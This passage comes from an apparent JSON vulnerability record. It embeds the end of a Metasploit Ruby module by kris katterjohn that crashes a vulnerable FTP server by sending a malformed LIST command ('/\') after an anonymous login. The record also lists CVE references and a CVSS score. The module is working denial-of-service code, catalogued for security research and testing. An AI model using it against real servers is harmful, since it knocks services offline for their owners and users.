simple LIST command\n },\n 'Author' => 'kris katterjohn',\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2008-2031' ],\n [ 'CVE', '2008-6829' ],\n [ 'OSVDB', '44608' ],\n [ 'EDB', '6834' ]\n ],\n 'DisclosureDate' => 'Oct 24 2008'))\n\n # They're required\n register_options([\n OptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ]),\n OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'anonymous' ])\n ])\n end\n\n def run\n return unless connect_login\n\n print_status(\"Sending command...\")\n\n # Try to wait for a response\n resp = send_cmd(['LIST', [0x2f, 0x5c].pack('CC')])\n\n disconnect\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/ftp/vicftps50_list.rb"}]}